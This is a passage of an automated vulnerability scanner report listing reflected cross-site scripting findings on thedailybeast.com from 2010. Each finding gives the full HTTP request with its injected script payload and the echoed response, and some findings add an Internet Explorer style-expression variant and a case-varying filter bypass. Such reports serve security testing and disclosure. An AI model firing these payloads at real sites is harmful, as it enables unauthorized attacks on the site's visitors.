<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker166fb"><script>alert(1)</script>e75361cb0b0/sexybeast/tweet-sheet/"/>
...[SNIP]...

1.75. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/tweet-sheet/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d87"><script>alert(1)</script>13c672e9d3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker/sexybeast/tweet-sheet69d87"><script>alert(1)</script>13c672e9d3f/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet69d87"><script>alert(1)</script>13c672e9d3f/"/>
...[SNIP]...

1.76. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d60"><script>alert(1)</script>db5a652cb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker45d60"><script>alert(1)</script>db5a652cb3/sexybeast/tweet-sheet/dita-von-teese346346/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker45d60"><script>alert(1)</script>db5a652cb3/sexybeast/tweet-sheet/dita-von-teese346346/"/>
...[SNIP]...

1.77. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46586"><script>alert(1)</script>015e296bc77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker/sexybeast/tweet-sheet46586"><script>alert(1)</script>015e296bc77/dita-von-teese346346/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet46586"><script>alert(1)</script>015e296bc77/dita-von-teese346346/"/>
...[SNIP]...

1.78. http://www.thedailybeast.com/partnersfeed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /partnersfeed/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd2b"><script>alert(1)</script>676adf887cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partnersfeed6fd2b"><script>alert(1)</script>676adf887cb/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/partnersfeed6fd2b"><script>alert(1)</script>676adf887cb/"/>
...[SNIP]...

1.79. http://www.thedailybeast.com/search/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /search/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d7d"><script>alert(1)</script>bc76b884a6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search43d7d"><script>alert(1)</script>bc76b884a6e/?cx=017680379443801271591%3As5g4uqjytqs&cof=FORID%3A9%3BNB%3A1&ie=UTF-8&q=%60 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/?cid=blogunit
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:50:58 GMT
Connection: close
Content-Length: 59663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/search43d7d"><script>alert(1)</script>bc76b884a6e/"/>
...[SNIP]...

1.80. http://www.thedailybeast.com/sexybeast/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /sexybeast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 421c5"><script>alert(1)</script>5348693c8a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sexybeast421c5"><script>alert(1)</script>5348693c8a2/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/sexybeast/421c5"><script>alert(1)</script>5348693c8a2/"/>
...[SNIP]...

1.81. http://www.thedailybeast.com/tag/50+cent/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/50+cent/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9004"><script>alert(1)</script>e41d04442a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd9004"><script>alert(1)</script>e41d04442a2/50+cent/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagd9004"><script>alert(1)</script>e41d04442a2/50+cent/"/>
...[SNIP]...

1.82. http://www.thedailybeast.com/tag/america’s%20next%20top%20model/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/america...s%20next%20top%20model/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0e60"style%3d"x%3aexpression(alert(1))"fd48884a177 was submitted in the REST URL parameter 1. This input was echoed as c0e60"style="x:expression(alert(1))"fd48884a177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tagc0e60"style%3d"x%3aexpression(alert(1))"fd48884a177/america...s%20next%20top%20model/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagc0e60"style="x:expression(alert(1))"fd48884a177/america...s next top model/"/>
...[SNIP]...

1.83. http://www.thedailybeast.com/tag/america’s%20next%20top%20model/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/america...s%20next%20top%20model/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73636"><script>alert(1)</script>d39c002ea36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag73636"><script>alert(1)</script>d39c002ea36/america...s%20next%20top%20model/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag73636"><script>alert(1)</script>d39c002ea36/america...s next top model/"/>
...[SNIP]...

1.84. http://www.thedailybeast.com/tag/antoine+dodson/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/antoine+dodson/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4df"><script>alert(1)</script>138242d0c5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag6f4df"><script>alert(1)</script>138242d0c5d/antoine+dodson/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag6f4df"><script>alert(1)</script>138242d0c5d/antoine+dodson/"/>
...[SNIP]...

1.85. http://www.thedailybeast.com/tag/arnold+schwarzenegger/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/arnold+schwarzenegger/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aedfc"><script>alert(1)</script>a102819a1d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagaedfc"><script>alert(1)</script>a102819a1d3/arnold+schwarzenegger/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagaedfc"><script>alert(1)</script>a102819a1d3/arnold+schwarzenegger/"/>
...[SNIP]...

1.86. http://www.thedailybeast.com/tag/chilean+miner+edison+pena/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/chilean+miner+edison+pena/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42388"><script>alert(1)</script>a4168bb80bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag42388"><script>alert(1)</script>a4168bb80bb/chilean+miner+edison+pena/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tag42388"><script>alert(1)</script>a4168bb80bb/chilean+miner+edison+pena/"/>
...[SNIP]...

1.87. http://www.thedailybeast.com/tag/christine%20o’donnell/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/christine%20o...donnell/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b27"><script>alert(1)</script>1c118ead74b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagb3b27"><script>alert(1)</script>1c118ead74b/christine%20o...donnell/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:59:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagb3b27"><script>alert(1)</script>1c118ead74b/christine o...donnell/"/>
...[SNIP]...

1.88. http://www.thedailybeast.com/tag/conan%20o’brien/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/conan%20o...brien/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9706"><ScRiPt>alert(1)</ScRiPt>e9a8b0856c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /tagc9706"><ScRiPt>alert(1)</ScRiPt>e9a8b0856c5/conan%20o...brien/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagc9706"><ScRiPt>alert(1)</ScRiPt>e9a8b0856c5/conan o...brien/"/>
...[SNIP]...

1.89. http://www.thedailybeast.com/tag/conan%20o’brien/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/conan%20o...brien/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4881"><script>alert(1)</script>240fb908a10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga4881"><script>alert(1)</script>240fb908a10/conan%20o...brien/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/taga4881"><script>alert(1)</script>240fb908a10/conan o...brien/"/>
...[SNIP]...

1.90. http://www.thedailybeast.com/tag/entertainment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/entertainment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f615c"><script>alert(1)</script>fa176293878 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf615c"><script>alert(1)</script>fa176293878/entertainment/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagf615c"><script>alert(1)</script>fa176293878/entertainment/"/>
...[SNIP]...

1.91. http://www.thedailybeast.com/tag/george+w+bush/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/george+w+bush/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a15ab"><script>alert(1)</script>fe7a665db89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga15ab"><script>alert(1)</script>fe7a665db89/george+w+bush/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/taga15ab"><script>alert(1)</script>fe7a665db89/george+w+bush/"/>
...[SNIP]...

1.92. http://www.thedailybeast.com/tag/glee/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/glee/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37aa"><script>alert(1)</script>f06f94f8a9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf37aa"><script>alert(1)</script>f06f94f8a9f/glee/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/tagf37aa"><script>alert(1)</script>f06f94f8a9f/glee/"/>
...[SNIP]...

1.93. http://www.thedailybeast.com/tag/gossip+girl/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /tag/gossip+girl/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d790e"><script>alert(1)</script>8236cf48970 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd790e"><script>alert(1)</script>8236cf48970/gossip+girl/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:02:05 GMT
Connection: close
Connection: Transfer-Encoding
